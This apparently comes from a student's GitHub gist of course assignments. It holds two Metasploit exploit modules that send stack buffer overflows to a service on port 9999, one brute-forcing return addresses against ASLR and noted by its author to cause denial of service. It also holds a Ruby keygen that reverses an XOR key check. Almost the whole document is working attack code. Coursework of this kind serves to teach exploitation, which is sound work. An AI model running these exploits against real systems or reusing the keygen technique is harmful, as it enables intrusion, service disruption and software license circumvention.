Created
December 8, 2014 17:46
-
-
Save PragTob/b8ea9ca37084e72e71b3 to your computer and use it in GitHub Desktop.
#myfirstrubyscript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
# | |
# This exploit affects the debian Linuxmachine from our IS Special task. | |
# | |
include Exploit::Remote::Tcp | |
def initialize(info = {}) | |
super(update_info(info, | |
'Name' => 'Istask11', | |
'Description' => %q{ | |
This explois was made as part of the Internet Security Special Task. | |
}, | |
'Author' => 'Tobi', | |
'Version' => '$Revision: 5 $', | |
'Payload' => | |
{ | |
'Space' => 1540, | |
'BadChars' => "\x00", | |
}, | |
'Targets' => | |
[ | |
# Target 0: Linux | |
[ | |
'Linux', | |
{ | |
'Platform' => 'linux', | |
'Ret' => 0xbfffef34, | |
'BufSize' => 1640 # as found out by debugging/boomerang | |
} | |
], | |
], | |
'DefaultTarget' => 0)) | |
#set a default port | |
register_options( | |
[ | |
Opt::RPORT(9999) | |
], self.class) | |
end | |
# | |
# The exploit method connects to the remote service and sends the payload | |
# followed by the fake return address and the nullbyte to end the string (otherwise it'd continue reading data which woould be bad | |
# | |
def exploit | |
connect | |
print_status ("Start exploiting the vulnerable debianmachine") | |
# | |
# Build the buffer for transmission | |
# the Nops after the payload are somehow necessary (didn't work without them), seems like payloads with push would overwrite themselves | |
# so I left NOPs which can be written instead of them (for now there are 100 nops, should be more than enough) | |
# | |
buf = payload.encoded + make_nops(target['BufSize'] - payload.encoded.length) + [target.ret].pack('V') + "\x00" | |
print_status("Sending #{buf.length} byte data") | |
# Send it off | |
sock.put(buf) | |
sock.get | |
handler | |
end | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
# | |
# This exploit affects the debian Linuxmachine from our IS Special task. | |
# take note of the description as I couldn't find another way in time. | |
# possible problem with overloading the process table of gentoo so that afterwards you can't do anything with the shell and it was an excellent DoS-attack.... | |
# | |
include Exploit::Remote::Tcp | |
def initialize(info = {}) | |
super(update_info(info, | |
'Name' => 'Istask12', | |
'Description' => %q{ | |
This explois was made as part of the Internet Security Special Task. | |
you got to watch the exploit on execution time... as soon as you see a dialog spawn (soemnthing out of the ordinary output) you got to press ctrl + C. afterwards | |
through session and session -i you can access the shell again. Yes it does not work with really high addresses, sadly. But than it performs an excellent DoS attack (as well as if you don't press ctrl+c). | |
}, | |
'Author' => 'Tobi', | |
'Version' => '$Revision: 100 $', | |
'Payload' => | |
{ | |
'Space' => 400, #should be enough for most of the payloads | |
'DisableNops' => true, #disabled cause I want to make them manually so I know how many of them i got before the shellcode starts | |
'BadChars' => "\x00", | |
}, | |
'Targets' => | |
[ | |
# Target 0: Linux | |
[ | |
'Linux', | |
{ | |
'Platform' => 'linux', | |
'Ret' => 0xbf800000, # stack is 8MB big... main shouldn't push that much data on the stack so that we miss out our desired buffer. Plus stack address always starts oxbf (as only 24 byte are randomized) | |
'BufSize' => 1032 # as found out by debugging/boomerang | |
} | |
], | |
], | |
'DefaultTarget' => 0)) | |
#set a default port | |
register_options( | |
[ | |
Opt::RPORT(9999) | |
], self.class) | |
end | |
# | |
# this time the enemy is secured by ASLR, fortunately not the PaX one. We'll use brute force (which will unfortunately create to many processes for gentoo to handle). | |
# | |
def exploit | |
print_status ("Start exploiting the vulnerable gentoomachine") | |
# | |
# initialization here we determine a couple of important values | |
# | |
return_address = target.ret | |
nops_after_payload = 12 # 4- aligned | |
nops_before_payload = target['BufSize'] - payload.encoded.length - nops_after_payload | |
print_status("nops_before_payload: #{nops_before_payload}") | |
# initialize the constant part of the buffer (for performancereasons) | |
standard_buf = make_nops(nops_before_payload) + payload.encoded + make_nops(nops_after_payload ) | |
# can't be really sure whether the payloadlength is always 4-aligned (at least I don't think so ) | |
payload_offset = 4- payload.encoded.length % 4 | |
# as long as we don't reach a region where our buffer can't be we keep on trying. | |
while (return_address < 0xc0000000) | |
connect | |
buf = standard_buf + [return_address].pack('V') + "\x00" #building the buffer with the returnaddress we are currently trying (little Endian) | |
print_status("trying address #{return_address} ") | |
# Send it off | |
sock.put(buf) | |
sock.get | |
handler | |
return_address += (nops_before_payload + payload_offset)# incrementing the returnaddress to try new ones (offset to keep 4-aligned | |
disconnect | |
end | |
end | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# This is my keygen (Tobias Pfeiffer) - I don't need ascii-art like that lame lethal-guitar guy | |
## the numbers as taken from the binary, which are used to XOR encrypt the key there | |
encryptnumbers= [0x45, 0x3A ,0xAB, 0xC8 ,0xCC ,0x15 ,0xE3, 0x7A] | |
# at first we create an array of possible encrypted values for each position (of the key), except the last one (key is 9 chars long) | |
# sicne ruby doesn't really support multidimensional arrays out of the box we got | |
# to add an array as an element | |
possencr = Array.new | |
for i in 0..7 do | |
#we're going to temporarily save the found values here | |
temparray = [] | |
for j in 0..255 do | |
keychar = j ^ encryptnumbers[i] | |
# if keychar is printable | |
if ((keychar >= 32) and (keychar <= 126)) | |
temparray << j | |
end | |
end | |
possencr << temparray | |
end | |
# in the resulting array, the first index is also the index of the keys/encryptnumbers | |
# the values stored and accessible with the second array are alle possible encryptedchars (95 each as found out) | |
# note that the numbers are in order (lowest number comes first) | |
# now we try to genereate a key | |
crypt = Array.new # saves the crypted signs we chose (cause we need them to make the sum | |
key = Array.new # saves the corresponding keychars | |
sum = 0 | |
for i in 0..4 do #just 4 because later on we try to fix things (with the last 3 chars), this part here is pure random | |
crypt[i] = possencr[i][rand(possencr[i].length)] | |
# key is automotically printable due to our awesome array | |
key[i] = crypt[i] ^ encryptnumbers[i] | |
sum+= crypt[i] | |
end | |
# so here will be some magice, we'll use our last 3 chars to adjust the sum in | |
# such a way that it's between 97 and 122. | |
# we're lucky, as I found out our last 3 possible encrypted chars, have no holes | |
# in the array, it's 95 elements each and all consecutive | |
# 109 = (sum+possencr[5][0]+possencr[6][0]+possencr[7][0]+offset)&255 -- that's just something o remind me how I want to calculate things, 109 because it's the middle of 97 and 122 | |
offset = 109- ((sum+possencr[5][0]+possencr[6][0]+possencr[7][0])&255) # &255 ---> take the last byte (least significant) | |
if offset <0 | |
offset = 256 + offset | |
end | |
# we simbly divide our offset equally to all chars, we could have problems with rounding, but we don't since it's a maximum of +-2 and with 109 we got more than enough space | |
index = offset/3 | |
# now make the damned last three chars! | |
for i in 5..7 do | |
crypt[i] = possencr[i][index] | |
key[i] = crypt[i] ^ encryptnumbers[i] | |
sum+= crypt[i] | |
end | |
# we just need the last byte | |
sum = sum & 255 | |
key[8] = sum | |
#make them chars (not numbers) | |
for i in 0..8 do | |
key[i]=key[i].chr | |
end | |
# make a string out of the array of chars | |
key = key.to_s | |
# output the key - BAM! | |
puts key |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment